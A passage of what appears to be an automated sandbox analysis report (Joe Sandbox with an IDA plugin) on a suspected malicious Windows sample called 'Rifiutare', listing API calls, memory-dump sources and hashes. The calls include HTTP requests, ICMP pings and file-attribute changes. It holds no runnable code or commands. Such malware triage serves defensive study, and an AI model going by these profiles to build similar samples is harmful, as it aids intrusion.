                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CCA86B
                                                                                • ShowWindow.USER32(00000003,00000000), ref: 00CCA88A
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCA8AF
                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CCA8D2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                • String ID:
                                                                                • API String ID: 1211466189-3916222277
                                                                                • Opcode ID: b09009158033b21e0a0a657c3786caf78e0140c9a4b2a16aecb624bd280adbeb
                                                                                • Instruction ID: f2c52786829ee71a1dcf85f9b14c6bb49ac8dff08324842cf0af170899b9b606
                                                                                • Opcode Fuzzy Hash: b09009158033b21e0a0a657c3786caf78e0140c9a4b2a16aecb624bd280adbeb
                                                                                • Instruction Fuzzy Hash: 48B19B35A00219DFDF14CF28C989BAE7BF2FF44705F188069ED599B295D730AA41CB62
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00CB0E02
                                                                                • inet_addr.WSOCK32(?), ref: 00CB0E62
                                                                                • gethostbyname.WSOCK32(?), ref: 00CB0E6E
                                                                                • IcmpCreateFile.IPHLPAPI ref: 00CB0E7C
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB0F0C
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CB0F2B
                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 00CB0FFF
                                                                                • WSACleanup.WSOCK32 ref: 00CB1005
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: 2b5e47e6f1b5d7e85c075ad9441e26d3f2d6e0bd7b94b9662cd2e5702ac36b96
                                                                                • Instruction ID: 6fa4b43df19f28eae689a9c91af6825bce770b791caf81ecdf37d9d79c43e36e
                                                                                • Opcode Fuzzy Hash: 2b5e47e6f1b5d7e85c075ad9441e26d3f2d6e0bd7b94b9662cd2e5702ac36b96
                                                                                • Instruction Fuzzy Hash: 8C9190316082419FD720DF55C489F6BBBE0BF48358F2485A9F46A8B7A2C730ED45CB92
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 707087890-567219261
                                                                                • Opcode ID: f33e6331fc55d7e3e17d2e330ae784300ee995bb0af97d5f1e2726ddd32242ed
                                                                                • Instruction ID: b282c37adf9c31583c725d3994556b34a7231aef5652b0fb859aa1320707be4d
                                                                                • Opcode Fuzzy Hash: f33e6331fc55d7e3e17d2e330ae784300ee995bb0af97d5f1e2726ddd32242ed
                                                                                • Instruction Fuzzy Hash: DD51B371A041169BCF25DF68C9909FDB3A5EF24324F204329FA2AD7284DB31DE45D790
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00CA8A58
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA8A68
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CA8A74
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CA8B11
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8B25
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8B57
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CA8B8D
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8B96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                • String ID: *.*
                                                                                • API String ID: 1464919966-438819550
                                                                                • Opcode ID: 204639dcb9c0d29b5e3bb47399dcd1c4a1f27e051430d5c83770230345b79d41
                                                                                • Instruction ID: ba0b06a4f5b1c5410d1f4a36182f255d2ddd41cbfbd8a62db7d3dea14d7ca466
                                                                                • Opcode Fuzzy Hash: 204639dcb9c0d29b5e3bb47399dcd1c4a1f27e051430d5c83770230345b79d41
                                                                                • Instruction Fuzzy Hash: DF618DB25043059FCB10EF60D884A9EB3E8FF8A314F04491EF99997251DB31EE49CB92
                                                                                APIs
                                                                                • CreateMenu.USER32 ref: 00CC4353
                                                                                • SetMenu.USER32(?,00000000), ref: 00CC4362
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC43EA
                                                                                • IsMenu.USER32(?), ref: 00CC43FE
                                                                                • CreatePopupMenu.USER32 ref: 00CC4408
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC4435
                                                                                • DrawMenuBar.USER32 ref: 00CC443D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                • String ID: 0$F
                                                                                • API String ID: 161812096-3044882817
                                                                                • Opcode ID: 5fdca985334b880ee974e8fb6ed552db021dbfb5ac73068ed6d647cf5b656e08
                                                                                • Instruction ID: 8c7c759d38a9c9c91c076de1ccc27580b826411b55f36ffd3b46e6f7f9da35c9
                                                                                • Opcode Fuzzy Hash: 5fdca985334b880ee974e8fb6ed552db021dbfb5ac73068ed6d647cf5b656e08
                                                                                • Instruction Fuzzy Hash: 424113B5A01209EFDB18CF64E894FAABBB5FF49314F14402CE956A7360C730AA10CF61
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                  • Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE
                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C92764
                                                                                • GetDlgCtrlID.USER32 ref: 00C9276F
                                                                                • GetParent.USER32 ref: 00C9278B
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9278E
                                                                                • GetDlgCtrlID.USER32(?), ref: 00C92797
                                                                                • GetParent.USER32(?), ref: 00C927AB
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C927AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 711023334-1403004172
                                                                                • Opcode ID: fd772e5fd39c652ff3f77c058c3513e92ac270e8599ff884d8eac6d23e502f25
                                                                                • Instruction ID: 3ca483847332e5d2103461f0890ee8ff33d4190f25f008a6db51b94e69048ab0
                                                                                • Opcode Fuzzy Hash: fd772e5fd39c652ff3f77c058c3513e92ac270e8599ff884d8eac6d23e502f25
                                                                                • Instruction Fuzzy Hash: AD21A774D00114BBCF05EFA0CC89FEEBBB8EF05350F104565F9A1A7292CA795959EB60
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                  • Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE
                                                                                • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C92843
                                                                                • GetDlgCtrlID.USER32 ref: 00C9284E
                                                                                • GetParent.USER32 ref: 00C9286A
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9286D
                                                                                • GetDlgCtrlID.USER32(?), ref: 00C92876
                                                                                • GetParent.USER32(?), ref: 00C9288A
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9288D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 711023334-1403004172
                                                                                • Opcode ID: e63ca265f7af232232444d1c0f6af9192ce2d26b647d58034e1fc14fa4f275a6
                                                                                • Instruction ID: 9fd6358e78c7501f4f6c2289c2052a6e6f0e90df9db1548b407075b6de735a1a
                                                                                • Opcode Fuzzy Hash: e63ca265f7af232232444d1c0f6af9192ce2d26b647d58034e1fc14fa4f275a6
                                                                                • Instruction Fuzzy Hash: 0E21A4B5D00118BBCF11ABA0CC89FEEBBB8EF05300F004465F991A7296DA795955EB64
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CC4177
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CC417A
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC41A1
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CC41C4
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CC423C
                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00CC4286
                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00CC42A1
                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00CC42BC
                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00CC42D0
                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00CC42ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 312131281-0
                                                                                • Opcode ID: b8965935899c1519debf45324e172e032a9b146a4fe204be3539f920c3036866
                                                                                • Instruction ID: e992836b9bc2d4850f0c7424f878b1c80fddd18210229e2ace52cc5660b90777
                                                                                • Opcode Fuzzy Hash: b8965935899c1519debf45324e172e032a9b146a4fe204be3539f920c3036866
                                                                                • Instruction Fuzzy Hash: A4617875900208AFDB24DFA8CC81FEE77B8EF09310F10416AFA15E72A1C770AA45DB60
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00C630B4
                                                                                  • Part of subcall function 00C62DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C6DBF1,?,00000000,?,00000000,?,00C6DC18,?,00000007,?,?,00C6E016,?), ref: 00C62DFE
                                                                                  • Part of subcall function 00C62DE8: GetLastError.KERNEL32(?,?,00C6DBF1,?,00000000,?,00000000,?,00C6DC18,?,00000007,?,?,00C6E016,?,?), ref: 00C62E10
                                                                                • _free.LIBCMT ref: 00C630C0
                                                                                • _free.LIBCMT ref: 00C630CB
                                                                                • _free.LIBCMT ref: 00C630D6
                                                                                • _free.LIBCMT ref: 00C630E1
                                                                                • _free.LIBCMT ref: 00C630EC
                                                                                • _free.LIBCMT ref: 00C630F7
                                                                                • _free.LIBCMT ref: 00C63102
                                                                                • _free.LIBCMT ref: 00C6310D
                                                                                • _free.LIBCMT ref: 00C6311B
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: b6d3f4051babf556d712def0f9b81902251e2711030454c9f31b4b0ea43d8b8c
                                                                                • Instruction ID: 0032c3fb7b2d58077b3c00d862b7257bd4e8cf1a7bea60f00387f5eaa4a1f599
                                                                                • Opcode Fuzzy Hash: b6d3f4051babf556d712def0f9b81902251e2711030454c9f31b4b0ea43d8b8c
                                                                                • Instruction Fuzzy Hash: 71117276500508BFCB21EF94CC82CDD7BB5EF05390B9141A5FA489B232DA32EE51EB81
                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CA87AE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CA87C2
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00CA87EC
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CA8806
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8818
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8861
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CA88B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$AttributesFile
                                                                                • String ID: *.*
                                                                                • API String ID: 769691225-438819550
                                                                                • Opcode ID: 5613cf6899eacf92661759db31d01127edfcf3936c0a008e99141c7f07f3bbb9
                                                                                • Instruction ID: e57a144acb59a6efbc012612f28850b5562e1daf8c39b21271e024f9fde87709
                                                                                • Opcode Fuzzy Hash: 5613cf6899eacf92661759db31d01127edfcf3936c0a008e99141c7f07f3bbb9
                                                                                • Instruction Fuzzy Hash: 9B81A1725043429BDB24EF15C444AAEB3E8BF86318F54482EF895D7251DF34DE49CB92
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00C36A1D
                                                                                  • Part of subcall function 00C36AAD: GetClientRect.USER32(?,?), ref: 00C36AD3
                                                                                  • Part of subcall function 00C36AAD: GetWindowRect.USER32(?,?), ref: 00C36B14
                                                                                  • Part of subcall function 00C36AAD: ScreenToClient.USER32(?,?), ref: 00C36B3C
                                                                                • GetDC.USER32 ref: 00C75960
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C75973
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00C75981
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00C75996
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00C7599E
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C75A2F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: cb96962691d93cda8df8e5fffd3b733c40602d06b7dc67dcd21c2b876509f674
                                                                                • Instruction ID: 90336e91849850564b298d492d2d6f872b6e980c342f56f7251aa83676113f11
                                                                                • Opcode Fuzzy Hash: cb96962691d93cda8df8e5fffd3b733c40602d06b7dc67dcd21c2b876509f674
                                                                                • Instruction Fuzzy Hash: 9E71D331500605EFCF218F64C885BBA7BB5FF49320F14C269ED6A5A2A6D7718D42EF60
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CACAA5
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CACACD
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CACAFD
                                                                                • GetLastError.KERNEL32 ref: 00CACB55
                                                                                • SetEvent.KERNEL32(?), ref: 00CACB69
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00CACB74
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 3113390036-3916222277
                                                                                • Opcode ID: 90c59393d9936e9b14814ded8662cb7ec8d2de8a14c7b105d9e0aa71e3476d8c
                                                                                • Instruction ID: c0177673f8e5ba34ba6e8d79679bdf4131b9d25059a05e4ccfb2ed1b944ec4a8
                                                                                • Opcode Fuzzy Hash: 90c59393d9936e9b14814ded8662cb7ec8d2de8a14c7b105d9e0aa71e3476d8c
                                                                                • Instruction Fuzzy Hash: 803178B1500309AFD7219F65D889FABBBFCEB4AB48B10452AF457D2200DB35DE04AB70
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C73B35,?,?,Bad directive syntax error,00CCDBF4,00000000,00000010,?,?), ref: 00C9A093
                                                                                • LoadStringW.USER32(00000000,?,00C73B35,?), ref: 00C9A09A
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C9A15E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 858772685-4153970271
                                                                                • Opcode ID: 02b8367066d160ad70705a18e3154ad368ba0da57ebe4845b82ccd7bee401c7f
                                                                                • Instruction ID: 96b8d0f3faef8a5e084776d560db5c4a44434a940940aff81e55d05452ecfffe
                                                                                • Opcode Fuzzy Hash: 02b8367066d160ad70705a18e3154ad368ba0da57ebe4845b82ccd7bee401c7f
                                                                                • Instruction Fuzzy Hash: C821A37185021EFBCF15AF90CC4AFEE7779BF18304F044469F516620A2DA71AA28EB51
                                                                                APIs
                                                                                • GetParent.USER32 ref: 00C928AB
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00C928C0
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C9294D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1290815626-3381328864
                                                                                • Opcode ID: 37fa8865406338fbbe939fd10493e0e01cf47e637d2b5ad635c22619c6f9e78b
                                                                                • Instruction ID: fa06596f1a08452a0baa3095f2f5dbf8ed5645a0f2695839fe75732fca0947a1
                                                                                • Opcode Fuzzy Hash: 37fa8865406338fbbe939fd10493e0e01cf47e637d2b5ad635c22619c6f9e78b
                                                                                • Instruction Fuzzy Hash: 9F110A7B24430BBAFE052721DC0FDB777ACAB05735F210032FA44E50D1EAA199816618
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
